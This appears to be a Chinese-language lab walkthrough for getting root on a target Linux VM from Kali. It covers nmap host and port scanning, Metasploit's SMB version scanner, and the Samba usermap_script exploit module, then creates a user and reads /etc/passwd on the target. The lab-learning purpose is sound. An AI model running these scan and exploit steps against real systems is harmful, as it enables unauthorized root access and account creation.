获取Linux系统的root权限
1.启动靶机和Kali系统
启动靶机
启动Kali
2.信息收集(采集) nmap
2.1 查找存活主机
nmap 192.168.198.132 【由于网络配置更改,所以使用的IP地址在后文有修改】
(修改两虚拟机在同一网段的具体流程:
依次点击 “更改配置” +> “还原默认设置”
检查攻击机和靶机的网络适配器(这里需要一样,若不一样,需要手动修改)
)
2.2 扫描开放端口
nmap -sS -Pn -A 192.168.204.129 #【-Pn 有点问题】
3. 查找漏洞信息
3.1 收集具体的版本号与对应的漏洞
漏洞收集工具(数据库) metasploite
search scanner/smb #查找smb协议
(或者 在kali界面 右上角
点击“ metasploit framework” 可切换 [ msf6 > ] )
use auxiliary/scanner/smb/smb_version #使用版本探测器
3.2 查找相应的漏洞工具
3.3 利用漏洞工具进行攻击
use exploit/multi/samba/usermap_script //切换漏洞工具 show options //显示需要在攻击前需要设置的数据
set RHOSTS 192.168.204.129 #此为靶机IP地址
(在这里直接输入下面的命令)
4. 获取目标机的 root 权限。新建一个用户
攻击机创建用户
useradd -m test
前往靶机查看
cat /etc/passwd #查看用户信息
